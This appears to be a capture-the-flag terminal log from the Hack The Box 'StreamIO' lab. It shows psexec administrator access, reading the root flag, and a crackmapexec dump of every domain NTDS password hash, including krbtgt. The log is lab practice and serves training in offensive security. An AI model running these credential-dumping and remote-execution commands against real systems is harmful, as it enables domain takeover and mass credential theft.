┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ impacket-psexec streamip.htb/administrator@$ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
<snip>
C:\Windows\system32> type C:\Users\Martin\Desktop\root.txt
fcca05f1388d18d964521ce53582793
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/StreamIO]
└─$ crackmapexec smb $ip -u administrator -p 'G58E)u0@)96rU1' --ntds
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [+] streamIO.htb\administrator:G58E)u0@)96rU1 (Pwn3d!)
SMB 10.10.11.158 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.158 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:63ab0c9344ca0c42ce367de76cafec16:::
SMB 10.10.11.158 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.158 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
SMB 10.10.11.158 445 DC JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
SMB 10.10.11.158 445 DC Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
SMB 10.10.11.158 445 DC nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
SMB 10.10.11.158 445 DC yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
SMB 10.10.11.158 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:8f92fd746817af09faa8257dfc127736:::
SMB 10.10.11.158 445 DC [+] Dumped 8 NTDS hashes to /home/kali/.cme/logs/DC_10.10.11.158_2024-07-09_083839.ntds of which 7 were added to the database
Root Flag: fcca05f1388d18d964521ce53582793